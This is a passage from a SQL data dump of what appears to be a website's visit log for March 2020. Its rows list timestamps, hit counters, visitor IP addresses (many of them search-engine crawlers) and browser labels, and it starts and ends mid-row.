4833932,1,1,0,0,'3.14.15.147','chrome'),(490581,1584834615,1,0,1,0,'207.46.13.121',''),(490582,1584834730,1,1,0,0,'207.46.13.121','other'),(490583,1584834999,1,1,0,0,'66.249.64.23','chrome'),(490584,1584835283,1,1,0,0,'66.249.64.25','chrome'),(490585,1584835457,1,0,1,0,'207.46.13.50',''),(490586,1584835461,1,1,0,0,'207.46.13.50','other'),(490587,1584835712,1,0,1,0,'207.46.13.121',''),(490588,1584836009,3,3,0,0,'66.249.64.23','chrome'),(490589,1584836063,1,1,0,0,'66.249.64.24','chrome'),(490590,1584836828,1,1,0,0,'151.80.39.236','other'),(490591,1584836928,1,1,0,0,'49.87.175.76','chrome'),(490592,1584836939,1,1,0,0,'49.82.120.205','chrome'),(490593,1584837175,1,1,0,0,'60.166.75.228','chrome'),(490594,1584837185,1,1,0,0,'117.69.30.156','chrome'),(490595,1584837205,1,1,0,0,'182.244.123.238','chrome'),(490596,1584837409,1,1,0,0,'93.124.15.87','chrome'),(490597,1584837981,1,1,0,0,'207.46.13.213','other'),(490598,1584838505,1,1,0,0,'62.205.134.182','other'),(490599,1584838566,1,1,0,0,'66.249.64.25','chrome'),(490600,1584838626,1,1,0,0,'66.249.64.23','chrome'),(490601,1584838726,1,1,0,0,'66.249.64.24','chrome'),(490602,1584839358,1,1,0,0,'207.46.13.121','other'),(490603,1584839696,2,2,0,0,'66.249.70.38','chrome'),(490604,1584839759,1,1,0,0,'66.249.64.25','chrome'),(490605,1584839928,1,1,0,0,'66.249.64.23','chrome'),(490606,1584840152,1,1,0,0,'178.154.200.19','other'),(490607,1584840695,1,1,0,0,'54.36.149.61','other'),(490608,1584841020,1,1,0,0,'66.249.64.23','chrome'),(490609,1584841486,1,1,0,0,'8.29.198.27','other'),(490610,1584842255,1,1,0,0,'8.29.198.26','other'),(490611,1584842411,1,1,0,0,'66.249.64.23','chrome'),(490612,1584842448,1,1,0,0,'66.249.64.24','chrome'),(490613,1584842598,1,1,0,0,'60.179.35.20','chrome'),(490614,1584842628,1,1,0,0,'66.249.64.25','chrome'),(490615,1584842791,1,1,0,0,'115.219.36.179','chrome'),(490616,1584842970,1,1,0,0,'117.64.235.172','chrome'),(490617,1584843862,1,1,0,0,'66.249.64.25','chrome'),(490618,1584843941,1,1,0,0,'213.180.203.107','other'),(490619,1584844378,1,1,0,0,'114.99.102.218','chrome'),(490620,1584844384,1,1,0,0,'114.101.246.45','chrome'),(490621,1584844386,1,1,0,0,'59.62.41.72','chrome'),(490622,1584844412,1,1,0,0,'125.123.69.64','chrome'),(490623,1584844681,1,1,0,0,'207.46.13.121','other'),(490624,1584844694,3,3,0,0,'104.198.165.190','chrome'),(490625,1584844739,3,3,0,0,'35.202.169.223','chrome'),(490626,1584844750,2,2,0,0,'104.197.237.129','chrome'),(490628,1584844760,2,2,0,0,'34.66.136.19','chrome'),(490630,1584844773,3,3,0,0,'35.222.241.213','chrome'),(490631,1584845186,1,1,0,0,'66.249.70.38','chrome'),(490632,1584845408,1,1,0,0,'207.46.13.213','other'),(490633,1584845462,1,1,0,0,'66.249.64.25','chrome'),(490634,1584845521,1,1,0,0,'54.36.149.94','other'),(490635,1584846204,1,1,0,0,'111.74.63.188','chrome'),(490636,1584846570,1,1,0,0,'66.249.64.23','chrome'),(490637,1584846577,1,1,0,0,'66.249.64.24','chrome'),(490638,1584846743,1,1,0,0,'54.36.149.47','other'),(490639,1584846912,1,1,0,0,'114.227.107.16','chrome'),(490640,1584847633,1,1,0,0,'183.166.99.35','chrome'),(490641,1584847776,2,2,0,0,'207.46.13.213','other'),(490642,1584847879,1,1,0,0,'66.249.64.24','chrome'),(490643,1584847900,3,3,0,0,'66.249.64.23','chrome'),(490644,1584848446,2,2,0,0,'157.55.39.222','other'),(490645,1584848823,1,1,0,0,'66.249.64.24','chrome'),(490646,1584849105,1,1,0,0,'66.249.64.23','chrome'),(490647,1584850528,1,1,0,0,'157.55.39.222','other'),(490648,1584851597,2,2,0,0,'66.249.64.24','chrome'),(490649,1584851809,1,1,0,0,'95.72.132.19','chrome'),(490650,1584852084,1,1,0,0,'66.249.64.23','chrome'),(490651,1584852317,1,1,0,0,'8.29.198.25','other'),(490652,1584853046,2,2,0,0,'66.249.64.23','chrome'),(490653,1584853072,1,1,0,0,'8.29.198.26','other'),(490654,1584853167,2,2,0,0,'66.249.64.24','chrome'),(490655,1584853544,1,1,0,0,'207.46.13.121','other'),(490656,1584854207,1,0,1,0,'66.249.64.25',''),(490657,1584855007,1,1,0,0,'66.249.64.25','chrome'),(490658,1584855122,1,1,0,0,'222.220.154.89','chrome'),(490659,1584855161,1,1,0,0,'175.173.220.156','chrome'),(490660,1584855182,1,1,0,0,'36.36.114.119','chrome'),(490661,1584855202,1,1,0,0,'114.223.162.116','chrome'),(490662,1584855214,1,1,0,0,'117.65.46.179','chrome'),(490663,1584855262,2,2,0,0,'66.249.64.23','chrome'),(490664,1584855479,1,1,0,0,'91.196.178.119','chrome'),(490665,1584855622,1,1,0,0,'31.13.103.3','other'),(490666,1584855628,1,1,0,0,'62.205.134.182','other'),(490667,1584855987,1,1,0,0,'66.249.70.33','chrome'),(490668,1584856294,1,0,1,0,'157.55.39.22',''),(490669,1584856555,1,0,1,0,'66.249.64.24',''),(490670,1584857361,1,0,1,0,'66.249.64.23',''),(490671,1584857597,3,3,0,0,'66.249.64.24','chrome'),(490672,1584857952,1,1,0,0,'121.230.42.42','chrome'),(490673,1584858566,1,1,0,0,'17.58.101.25','other'),(490674,1584858936,1,1,0,0,'66.249.64.24','chrome'),(490675,1584859725,4,4,0,0,'66.249.64.23','chrome'),(490676,1584860227,2,2,0,0,'207.46.13.150','other'),(490677,1584860320,1,1,0,0,'114.99.176.218','chrome'),(490678,1584860337,1,1,0,0,'112.113.155.58','chrome'),(490679,1584860358,1,1,0,0,'183.156.14.174','chrome'),(490680,1584861270,1,1,0,0,'66.249.64.25','chrome'),(490681,1584861801,2,2,0,0,'157.55.39.222','other'),(490682,1584862047,2,2,0,0,'66.249.64.24','chrome'),(490683,1584862092,1,1,0,0,'66.249.70.36','chrome'),(490684,1584862226,1,1,0,0,'66.249.64.23','chrome'),(490685,1584862571,1,1,0,0,'66.249.64.25','chrome'),(490686,1584862885,1,1,0,0,'157.55.39.22','other'),(490687,1584863132,1,1,0,0,'31.13.127.21','other'),(490688,1584863153,2,2,0,0,'8.29.198.26','other'),(490689,1584863339,1,1,0,0,'91.196.178.72','chrome'),(490690,1584863677,3,3,0,0,'66.249.64.24','chrome'),(490691,1584863902,4,4,0,0,'66.249.64.23','chrome'),(490692,1584864045,2,2,0,0,'66.249.70.38','chrome'),(490693,1584864100,1,1,0,0,'178.154.200.26','other'),(490694,1584864253,1,1,0,0,'66.249.64.25','chrome'),(490695,1584864608,1,1,0,0,'60.220.118.108','chrome'),(490696,1584864685,1,1,0,0,'46.211.52.171','chrome'),(490697,1584864843,1,1,0,0,'116.171.248.47','chrome'),(490698,1584865073,1,1,0,0,'66.249.70.38','chrome'),(490699,1584865174,1,1,0,0,'207.46.13.213','other'),(490700,1584865420,1,1,0,0,'66.249.64.24','chrome'),(490701,1584866437,1,1,0,0,'114.238.16.12','chrome'),(490702,1584866954,4,4,0,0,'66.249.64.23','chrome'),(490703,1584867581,1,1,0,0,'66.249.64.24','chrome'),(490704,1584867650,1,1,0,0,'66.249.70.38','chrome'),(490705,1584868546,2,2,0,0,'207.46.13.150','other'),(490706,1584869021,1,1,0,0,'207.46.13.213','other'),(490707,1584869228,1,1,0,0,'117.91.254.160','chrome'),(490708,1584869233,1,1,0,0,'118.170.235.223','chrome'),(490709,1584869238,1,1,0,0,'180.123.205.27','chrome'),(490710,1584869344,1,1,0,0,'66.249.64.23','chrome'),(490711,1584869405,2,2,0,0,'66.249.64.24','chrome'),(490712,1584869450,1,1,0,0,'157.55.39.222','other'),(490713,1584870029,1,1,0,0,'114.106.135.174','chrome'),(490714,1584870032,1,1,0,0,'124.113.218.38','chrome'),(490715,1584871433,1,1,0,0,'178.154.200.77','other'),(490716,1584871845,2,2,0,0,'66.249.64.25','chrome'),(490717,1584872017,1,1,0,0,'207.46.13.213','other'),(490718,1584872316,1,1,0,0,'66.249.70.36','chrome'),(490719,1584873189,1,1,0,0,'66.249.64.23','chrome'),(490720,1584873852,1,1,0,0,'66.249.70.36','chrome'),(490721,1584873953,2,2,0,0,'66.249.64.25','chrome'),(490722,1584873978,1,1,0,0,'8.29.198.25','other'),(490723,1584874008,1,1,0,0,'95.132.41.198','chrome'),(490724,1584874469,1,1,0,0,'207.46.13.150','other'),(490725,1584874655,1,1,0,0,'138.201.12.50','msie'),(490726,1584874662,1,1,0,0,'138.201.12.50','chrome'),(490727,1584874722,1,1,0,0,'8.29.198.27','other'),(490728,1584875122,1,1,0,0,'66.249.70.36','chrome'),(490729,1584876264,1,1,0,0,'66.249.70.36','chrome'),(490730,1584877383,1,1,0,0,'109.74.154.72','chrome'),(490731,1584877758,2,2,0,0,'207.46.13.150','other'),(490732,1584878006,1,1,0,0,'178.95.244.73','chrome'),(490733,1584878129,4,4,0,0,'157.55.39.222','other'),(490734,1584878170,2,2,0,0,'207.46.13.213','other'),(490735,1584878193,1,1,0,0,'66.249.70.36','chrome'),(490736,1584878505,1,1,0,0,'193.106.30.99','firefox'),(490737,1584878588,1,1,0,0,'115.225.64.117','chrome'),(490738,1584878608,1,1,0,0,'183.92.253.80','chrome'),(490739,1584878642,1,1,0,0,'114.100.27.189','chrome'),(490740,1584879063,1,1,0,0,'66.249.70.38','chrome'),(490741,1584879171,2,2,0,0,'66.249.64.25','chrome'),(490742,1584879594,2,2,0,0,'157.55.39.222','other'),(490743,1584881064,1,1,0,0,'157.55.39.22','other'),(490744,1584881700,1,1,0,0,'66.249.64.23','chrome'),(490745,1584882111,2,2,0,0,'66.249.64.24','chrome'),(490746,1584882212,3,3,0,0,'66.249.64.25','chrome'),(490747,1584882964,2,2,0,0,'207.46.13.150','other'),(490748,1584883194,1,1,0,0,'207.46.13.213','other'),(490749,1584883454,1,1,0,0,'66.249.64.23','chrome'),(490750,1584883862,1,1,0,0,'66.249.64.24','chrome'),(490751,1584884020,2,2,0,0,'66.249.64.25','chrome'),(490752,1584884103,1,1,0,0,'207.46.13.150','other'),(490753,1584884181,2,2,0,0,'207.46.13.213','other'),(490754,1584884364,1,1,0,0,'66.249.64.23','chrome'),(490755,1584884803,1,1,0,0,'8.29.198.27','other'),(490756,1584884851,1,1,0,0,'157.55.39.22','other'),(490757,1584884987,1,1,0,0,'66.249.64.24','chrome'),(490758,1584885037,1,1,0,0,'207.46.13.150','other'),(490759,1584885226,1,1,0,0,'114.227.160.49','chrome'),(490760,1584885256,1,1,0,0,'123.156.176.59','chrome'),(490761,1584885278,1,1,0,0,'183.211.79.177','chrome'),(490762,1584885291,1,1,0,0,'49.88.159.244','chrome'),(490763,1584885431,1,1,0,0,'66.249.64.25','chrome'),(490764,1584885549,1,1,0,0,'8.29.198.26','other'),(490765,1584885632,1,1,0,0,'125.105.243.230','chrome'),(490766,1584885644,1,1,0,0,'213.180.203.64','other'),(490767,1584885713,1,1,0,0,'114.238.205.129','chrome'),(490768,1584885728,2,1,1,0,'66.249.64.23',''),(490769,1584885909,1,1,0,0,'66.249.70.38','chrome'),(490770,1584886316,1,1,0,0,'66.249.64.23','chrome'),(490771,1584886382,4,4,0,0,'220.181.77.162','other'),(490772,1584887049,2,2,0,0,'157.55.39.222','other'),(490773,1584887125,1,1,0,0,'66.249.70.36','chrome'),(490774,1584887330,1,1,0,0,'66.249.64.23','chrome'),(490775,1584887932,2,2,0,0,'66.249.64.25','chrome'),(490776,1584887948,1,1,0,0,'66.249.70.33','chrome'),(490777,1584887975,1,1,0,0,'173.252.111.4','other'),(490778,1584888180,1,1,0,0,'207.46.13.213','other'),(490779,1584888425,1,1,0,0,'207.46.13.150','other'),(490780,1584888430,2,2,0,0,'66.249.64.24','chrome'),(490781,1584888661,1,1,0,0,'66.249.64.23','chrome'),(490782,1584889394,2,2,0,0,'66.249.64.25','chrome'),(490783,1584889447,1,1,0,0,'66.249.64.24','chrome'),(490784,1584889659,1,1,0,0,'157.55.39.222','other'),(490785,1584890055,1,1,0,0,'46.211.58.71','chrome'),(490786,1584890349,1,1,0,0,'188.166.232.14','firefox'),(490787,1584890419,3,3,0,0,'66.249.64.25','chrome'),(490788,1584890788,1,1,0,0,'66.249.70.33','chrome'),(490789,1584890873,3,3,0,0,'66.249.64.23','chrome'),(490790,1584890881,1,1,0,0,'157.55.39.222','other'),(490791,1584891330,1,1,0,0,'207.46.13.213','other'),(490792,1584891586,1,1,0,0,'66.249.64.24','chrome'),(490793,1584892117,1,1,0,0,'122.246.95.244','chrome'),(490794,1584892131,1,1,0,0,'59.63.75.15','chrome'),(490795,1584892144,1,1,0,0,'122.231.114.126','chrome'),(490796,1584892148,1,1,0,0,'111.75.117.146','chrome'),(490797,1584892164,1,1,0,0,'111.73.240.243','chrome'),(490798,1584892631,2,2,0,0,'66.249.64.24','chrome'),(490799,1584892785,1,1,0,0,'66.249.70.38','chrome'),(490800,1584892898,2,2,0,0,'66.249.64.23','chrome'),(490801,1584892904,1,1,0,0,'207.46.13.150','other'),(490802,1584893411,3,3,0,0,'157.55.39.22','other'),(490803,1584893672,1,1,0,0,'213.180.203.186','other'),(490804,1584893919,1,1,0,0,'207.46.13.150','other'),(490805,1584894161,1,0,1,0,'66.249.64.23',''),(490806,1584894666,2,2,0,0,'66.249.64.24','chrome'),(490807,1584894673,1,1,0,0,'66.249.70.33','chrome'),(490808,1584895326,1,1,0,0,'213.180.203.186','other'),(490809,1584895628,1,1,0,0,'8.29.198.26','other'),(490810,1584896107,2,2,0,0,'66.249.64.24','chrome'),(490811,1584896284,1,1,0,0,'66.249.64.23','chrome'),(490812,1584896372,1,1,0,0,'8.29.198.27','other'),(490813,1584896456,1,1,0,0,'66.249.64.25','chrome'),(490814,1584898557,1,1,0,0,'207.46.13.150','other'),(490815,1584898622,1,1,0,0,'207.46.13.186','other'),(490816,1584898639,1,0,1,0,'157.55.39.222',''),(490817,1584898833,1,1,0,0,'178.154.171.127','other'),(490818,1584898906,1,1,0,0,'178.154.171.134','other'),(490819,1584899025,1,1,0,0,'157.55.39.222','other'),(490820,1584899830,1,1,0,0,'66.249.70.36','chrome'),(490821,1584899882,1,1,0,0,'66.249.64.24','chrome'),(490822,1584899894,1,1,0,0,'183.143.50.38','chrome'),(490823,1584899928,1,1,0,0,'114.227.11.122','chrome'),(490824,1584899953,1,1,0,0,'182.34.213.159','chrome'),(490825,1584899955,1,1,0,0,'171.221.55.145','chrome'),(490826,1584899977,1,1,0,0,'207.46.13.150','other'),(490827,1584899984,1,1,0,0,'36.26.226.216','chrome'),(490828,1584900050,1,1,0,0,'117.95.7.93','chrome'),(490829,1584900095,1,1,0,0,'66.249.70.38','chrome'),(490830,1584900404,1,1,0,0,'131.220.6.152','chrome'),(490831,1584900525,1,1,0,0,'157.55.39.222','other'),(490832,1584901630,1,1,0,0,'66.249.70.38','chrome'),(490833,1584901895,1,1,0,0,'171.83.99.206','chrome'),(490834,1584901900,1,1,0,0,'114.238.54.145','chrome'),(490835,1584901906,1,1,0,0,'183.165.40.232','chrome'),(490836,1584901908,1,1,0,0,'117.64.250.178','chrome'),(490837,1584901912,2,2,0,0,'106.92.102.204','chrome'),(490838,1584901954,1,1,0,0,'219.137.54.30','chrome'),(490839,1584902019,1,1,0,0,'66.249.70.36','chrome'),(490840,1584902066,2,2,0,0,'157.55.39.222','other'),(490841,1584902071,2,2,0,0,'66.249.64.23','chrome'),(490842,1584902265,1,1,0,0,'66.249.64.25','chrome'),(490843,1584902318,1,1,0,0,'66.249.70.33','chrome'),(490844,1584902519,2,2,0,0,'207.46.13.213','other'),(490845,1584902685,1,1,0,0,'111.178.136.221','chrome'),(490846,1584902686,1,1,0,0,'117.91.131.209','chrome'),(490847,1584902699,1,1,0,0,'123.245.212.117','chrome'),(490848,1584903008,1,1,0,0,'66.249.70.36','chrome'),(490849,1584903035,1,1,0,0,'93.80.250.248','chrome'),(490850,1584903447,1,1,0,0,'207.46.13.186','other'),(490851,1584903472,1,0,1,0,'157.55.39.222',''),(490852,1584903473,1,1,0,0,'157.55.39.222','other'),(490853,1584903506,1,1,0,0,'117.57.63.159','chrome'),(490854,1584903507,1,1,0,0,'114.102.37.190','chrome'),(490855,1584903509,1,1,0,0,'59.63.84.184','chrome'),(490856,1584903514,1,1,0,0,'180.165.80.155','chrome'),(490857,1584903730,1,1,0,0,'66.249.70.33','chrome'),(490858,1584904000,2,2,0,0,'207.46.13.150','other'),(490859,1584904426,1,1,0,0,'66.249.64.23','chrome'),(490860,1584904938,1,1,0,0,'66.249.70.33','chrome'),(490861,1584905052,1,1,0,0,'157.55.39.222','other'),(490862,1584905496,1,1,0,0,'66.249.64.25','chrome'),(490863,1584906459,1,1,0,0,'8.29.198.25','other'),(490864,1584906689,1,1,0,0,'157.55.39.222','other'),(490865,1584906702,2,2,0,0,'66.249.64.24','chrome'),(490866,1584906953,1,1,0,0,'182.111.121.29','chrome'),(490867,1584906970,1,1,0,0,'117.91.131.183','chrome'),(490868,1584906978,1,1,0,0,'124.130.102.152','chrome'),(490869,1584906980,1,1,0,0,'182.244.168.243','chrome'),(490870,1584907201,1,1,0,0,'8.29.198.27','other'),(490871,1584907442,4,4,0,0,'66.249.64.23','chrome'),(490872,1584907535,1,1,0,0,'207.46.13.150','other'),(490873,1584907757,4,3,1,0,'66.249.64.24',''),(490874,1584907923,1,1,0,0,'157.55.39.222','other'),(490875,1584909297,1,1,0,0,'157.55.39.22','other'),(490876,1584909835,1,0,1,0,'66.249.64.23',''),(490877,1584909852,1,1,0,0,'213.180.203.186','other'),(490878,1584909981,1,1,0,0,'207.46.13.213','other'),(490879,1584910064,1,1,0,0,'178.154.171.134','other'),(490880,1584910238,1,1,0,0,'66.249.70.33','chrome'),(490881,1584910394,2,2,0,0,'66.249.64.25','chrome'),(490882,1584911033,1,1,0,0,'157.55.39.222','other'),(490883,1584911206,2,2,0,0,'207.46.13.150','other'),(490884,1584912302,1,1,0,0,'17.58.101.25','other'),(490885,1584912712,1,1,0,0,'66.249.64.25','chrome'),(490886,1584912729,1,1,0,0,'66.249.64.23','chrome'),(490887,1584913225,1,1,0,0,'207.46.13.150','other'),(490888,1584913375,1,0,1,0,'157.55.39.22',''),(490889,1584914600,1,1,0,0,'207.46.13.150','other'),(490890,1584914751,1,1,0,0,'157.55.39.222','other'),(490891,1584915517,1,1,0,0,'66.249.64.24','chrome'),(490892,1584916042,1,1,0,0,'183.195.2.96','chrome'),(490893,1584916043,1,1,0,0,'175.173.222.17','chrome'),(490894,1584916495,2,2,0,0,'66.249.64.25','chrome'),(490895,1584916537,1,1,0,0,'213.180.203.186','other'),(490896,1584916601,1,1,0,0,'178.154.171.134','other'),(490897,1584917210,1,1,0,0,'157.55.39.222','other'),(490898,1584917214,1,1,0,0,'207.46.13.213','other'),(490899,1584917298,2,2,0,0,'8.29.198.27','other'),(490900,1584918272,2,2,0,0,'66.249.64.23','chrome'),(490901,1584918884,2,2,0,0,'207.46.13.150','other'),(490902,1584919038,1,1,0,0,'207.46.13.213','other'),(490903,1584919091,1,1,0,0,'157.55.39.22','other'),(490904,1584919942,2,2,0,0,'66.249.64.24','chrome'),(490905,1584920111,1,1,0,0,'157.55.39.222','other'),(490906,1584920208,1,1,0,0,'207.46.13.150','other'),(490907,1584920334,1,1,0,0,'157.55.39.22','other'),(490908,1584921418,1,1,0,0,'66.249.64.24','chrome'),(490909,1584921533,1,1,0,0,'111.201.238.184','chrome'),(490910,1584922164,1,1,0,0,'207.46.13.150','other'),(490911,1584922269,1,1,0,0,'66.249.70.38','chrome'),(490912,1584922446,1,1,0,0,'66.249.64.25','chrome'),(490913,1584922478,1,1,0,0,'114.239.150.214','chrome'),(490914,1584922688,1,1,0,0,'40.77.139.27','other'),(490915,1584922837,1,1,0,0,'178.154.171.127','other'),(490916,1584923686,1,1,0,0,'93.79.97.176','firefox'),(490917,1584923750,1,1,0,0,'207.46.13.150','other'),(490918,1584923884,1,1,0,0,'66.249.70.36','chrome'),(490919,1584924329,1,1,0,0,'157.55.39.222','other'),(490920,1584924392,1,1,0,0,'66.249.64.25','chrome'),(490921,1584924537,1,1,0,0,'125.123.146.141','chrome'),(490922,1584924548,1,1,0,0,'114.238.203.140','chrome'),(490923,1584924969,1,1,0,0,'62.205.134.182','other'),(490924,1584925124,1,1,0,0,'66.249.64.24','chrome'),(490925,1584925902,1,1,0,0,'66.249.64.23','chrome'),(490926,1584926325,1,1,0,0,'157.55.39.22','other'),(490927,1584926415,1,1,0,0,'66.249.64.24','chrome'),(490928,1584926463,1,1,0,0,'37.73.168.147','chrome'),(490929,1584926798,1,1,0,0,'66.249.64.25','chrome'),(490930,1584927003,2,2,0,0,'66.249.64.23','chrome'),(490931,1584927040,1,1,0,0,'157.55.39.222','other'),(490932,1584927665,1,1,0,0,'213.180.203.82','other'),(490933,1584927711,1,1,0,0,'66.249.70.38','chrome'),(490934,1584928073,1,1,0,0,'66.249.64.25','chrome'),(490935,1584928134,2,2,0,0,'8.29.198.25','other'),(490936,1584929668,1,1,0,0,'66.249.64.24','chrome'),(490937,1584929696,1,0,1,0,'157.55.39.22',''),(490938,1584929726,1,1,0,0,'213.180.203.52','other'),(490939,1584930057,1,1,0,0,'66.249.70.33','chrome'),(490940,1584930848,1,1,0,0,'157.55.39.22','other'),(490941,1584931476,1,1,0,0,'66.249.64.25','chrome'),(490942,1584931857,1,1,0,0,'36.4.134.82','chrome'),(490943,1584931864,1,1,0,0,'222.89.171.181','chrome'),(490944,1584931871,1,1,0,0,'218.65.67.254','chrome'),(490945,1584931884,3,1,2,0,'157.55.39.22',''),(490946,1584932039,1,1,0,0,'66.249.64.23','chrome'),(490947,1584932342,1,1,0,0,'66.249.70.36','chrome'),(490948,1584932789,1,1,0,0,'213.180.203.186','other'),(490949,1584932942,2,1,1,0,'157.55.39.222',''),(490950,1584933098,1,1,0,0,'66.249.64.24','chrome'),(490951,1584933221,1,1,0,0,'66.249.64.25','chrome'),(490952,1584933957,1,1,0,0,'207.46.13.213','other'),(490953,1584933990,1,1,0,0,'207.46.13.150','other'),(490954,1584934763,1,1,0,0,'213.180.203.186','other'),(490955,1584935089,1,1,0,0,'157.55.39.222','other'),(490956,1584935917,1,1,0,0,'122.246.91.57','chrome'),(490957,1584935994,1,1,0,0,'213.180.203.191','other'),(490958,1584937066,1,1,0,0,'17.58.101.25','other'),(490959,1584937222,1,1,0,0,'157.55.39.22','other'),(490960,1584937615,2,2,0,0,'66.249.64.25','chrome'),(490961,1584937746,1,1,0,0,'66.249.70.38','chrome'),(490962,1584938278,1,1,0,0,'66.249.64.23','chrome'),(490963,1584938473,1,0,1,0,'66.249.64.24',''),(490964,1584938969,1,1,0,0,'8.29.198.27','other'),(490965,1584939394,1,1,0,0,'66.249.64.24','chrome'),(490966,1584939658,1,1,0,0,'223.73.146.38','chrome'),(490967,1584939690,1,1,0,0,'8.29.198.25','other'),(490968,1584939939,1,1,0,0,'207.46.13.150','other'),(490969,1584940248,1,1,0,0,'66.249.64.25','chrome'),(490970,1584940279,1,1,0,0,'66.249.70.33','chrome'),(490971,1584940387,1,1,0,0,'66.249.64.23','chrome'),(490972,1584941062,1,0,1,0,'207.46.13.150',''),(490973,1584941190,1,1,0,0,'117.64.149.54','chrome'),(490974,1584941607,1,1,0,0,'66.249.64.24','chrome'),(490975,1584941952,4,2,2,0,'157.55.39.22',''),(490976,1584942007,1,1,0,0,'116.55.141.60','chrome'),(490977,1584942075,1,1,0,0,'62.205.134.182','other'),(490978,1584942430,1,1,0,0,'113.13.149.197','chrome'),(490979,1584942637,3,0,3,0,'207.46.13.150',''),(490980,1584942643,3,0,3,0,'207.46.13.213',''),(490981,1584942657,2,0,2,0,'157.55.39.222',''),(490982,1584942947,1,1,0,0,'207.46.13.186','other'),(490983,1584943246,1,1,0,0,'17.58.101.25','other'),(490984,1584943466,1,1,0,0,'157.55.39.22','other'),(490985,1584944136,1,0,1,0,'13.66.139.0',''),(490986,1584944697,1,1,0,0,'207.46.13.150','other'),(490987,1584944726,2,2,0,0,'157.55.39.22','other'),(490988,1584945137,1,1,0,0,'157.55.39.222','other'),(490989,1584945168,1,1,0,0,'91.196.178.66','chrome'),(490990,1584945320,2,1,1,0,'66.249.64.24',''),(490991,1584946129,1,1,0,0,'91.196.178.66','chrome'),(490992,1584946151,3,3,0,0,'31.13.127.2','other'),(490993,1584946152,2,2,0,0,'31.13.127.22','other'),(490994,1584946154,3,3,0,0,'31.13.127.4','other'),(490995,1584946174,1,1,0,0,'31.13.127.6','other'),(490996,1584946177,1,1,0,0,'173.252.127.32','other'),(490997,1584946178,2,2,0,0,'31.13.127.20','other'),(490998,1584946196,1,1,0,0,'31.13.127.14','other'),(490999,1584946197,1,1,0,0,'31.13.127.10','other'),(491000,1584946198,1,1,0,0,'31.13.127.12','other'),(491002,1584946229,1,1,0,0,'66.249.70.33','chrome'),(491003,1584946245,1,1,0,0,'31.13.127.13','other'),(491004,1584946918,1,1,0,0,'27.150.87.45','chrome'),(491005,1584947095,1,1,0,0,'125.121.119.108','chrome'),(491006,1584947163,1,1,0,0,'171.104.129.55','chrome'),(491007,1584947764,1,1,0,0,'31.129.229.50','chrome'),(491008,1584947825,2,2,0,0,'157.55.39.22','other'),(491009,1584947900,1,1,0,0,'59.63.74.221','chrome'),(491010,1584947918,1,1,0,0,'223.89.255.202','chrome'),(491011,1584947935,1,1,0,0,'93.73.113.14','chrome'),(491012,1584948008,1,1,0,0,'31.13.127.4','other'),(491013,1584948014,1,1,0,0,'91.196.178.66','chrome'),(491014,1584948296,1,1,0,0,'91.196.178.113','chrome'),(491015,1584948448,1,1,0,0,'207.46.13.213','other'),(491016,1584948453,1,1,0,0,'207.46.13.150','other'),(491017,1584948679,1,1,0,0,'66.249.64.23','chrome'),(491018,1584948960,1,1,0,0,'128.124.161.151','chrome'),(491019,1584949168,1,1,0,0,'66.249.64.24','chrome'),(491020,1584949372,1,1,0,0,'157.55.39.22','other'),(491021,1584949409,1,0,1,0,'157.55.39.222',''),(491022,1584949555,1,1,0,0,'207.46.13.150','other'),(491023,1584949656,1,1,0,0,'66.249.70.38','chrome'),(491024,1584949798,1,1,0,0,'8.29.198.26','other'),(491025,1584950256,2,2,0,0,'66.249.64.24','chrome'),(491026,1584950519,1,1,0,0,'8.29.198.27','other'),(491027,1584950536,1,1,0,0,'139.208.110.233','chrome'),(491028,1584950539,1,1,0,0,'61.131.147.131','chrome'),(491029,1584950946,1,1,0,0,'58.100.48.227','chrome'),(491030,1584951086,1,1,0,0,'91.196.178.163','chrome'),(491031,1584951369,1,1,0,0,'183.221.108.168','chrome'),(491032,1584951460,1,1,0,0,'92.112.249.201','chrome'),(491033,1584952516,1,1,0,0,'157.55.39.22','other'),(491034,1584952669,1,1,0,0,'91.196.178.188','chrome'),(491035,1584952877,1,1,0,0,'207.46.13.150','other'),(491036,1584952879,1,1,0,0,'91.196.177.46','chrome'),(491037,1584953370,1,1,0,0,'91.196.178.23','chrome'),(491038,1584953495,1,1,0,0,'66.249.64.23','chrome'),(491039,1584954085,1,1,0,0,'114.96.169.58','chrome'),(491040,1584954195,1,1,0,0,'178.154.200.77','other'),(491041,1584954325,1,1,0,0,'180.107.35.119','chrome'),(491042,1584954402,1,1,0,0,'91.196.178.113','chrome'),(491043,1584954729,1,1,0,0,'66.249.64.25','chrome'),(491044,1584954966,1,1,0,0,'213.180.203.21','other'),(491045,1584955077,1,1,0,0,'91.196.179.25','chrome'),(491046,1584955471,1,1,0,0,'182.32.77.148','chrome'),(491047,1584955695,2,2,0,0,'157.55.39.22','other'),(491048,1584956331,1,1,0,0,'176.36.120.97','chrome'),(491049,1584956386,1,1,0,0,'66.249.64.25','chrome'),(491050,1584956611,1,1,0,0,'95.134.189.49','chrome'),(491051,1584957008,1,1,0,0,'91.196.178.104','chrome'),(491052,1584957044,1,1,0,0,'157.55.39.222','other'),(491053,1584957082,1,1,0,0,'66.249.64.31','chrome'),(491054,1584957155,1,0,1,0,'157.55.39.22',''),(491055,1584957255,1,1,0,0,'218.64.223.106','chrome'),(491056,1584957268,1,1,0,0,'117.66.95.218','chrome'),(491057,1584957325,1,1,0,0,'207.46.13.213','other'),(491058,1584957925,1,0,1,0,'207.46.13.150',''),(491059,1584957979,1,1,0,0,'3.21.53.135','chrome'),(491060,1584958240,1,1,0,0,'52.53.170.149','chrome'),(491061,1584958246,1,1,0,0,'54.67.2.25','chrome'),(491062,1584958248,13,13,0,0,'13.57.211.63','chrome'),(491063,1584959461,1,1,0,0,'66.249.64.1','chrome'),(491064,1584959879,1,1,0,0,'66.249.64.30','chrome'),(491065,1584960011,1,1,0,0,'207.46.13.213','other'),(491066,1584960625,1,1,0,0,'8.29.198.26','other'),(491067,1584961139,1,1,0,0,'91.196.177.46','chrome'),(491068,1584961345,1,1,0,0,'8.29.198.25','other'),(491069,1584961396,1,1,0,0,'213.180.203.191','other'),(491070,1584962516,1,1,0,0,'157.55.39.22','other'),(491071,1584962562,1,1,0,0,'91.196.179.25','chrome'),(491072,1584962807,1,1,0,0,'178.133.173.249','chrome'),(491073,1584962976,2,1,1,0,'207.46.13.213',''),(491074,1584963837,1,1,0,0,'109.74.154.72','chrome'),(491075,1584963983,1,1,0,0,'207.46.13.213','other'),(491076,1584964605,1,1,0,0,'5.196.92.91','firefox'),(491077,1584965458,1,1,0,0,'109.234.34.254','chrome'),(491078,1584965600,1,1,0,0,'213.180.203.64','other'),(491079,1584965685,2,1,1,0,'157.55.39.222',''),(491080,1584965886,1,1,0,0,'223.215.177.31','c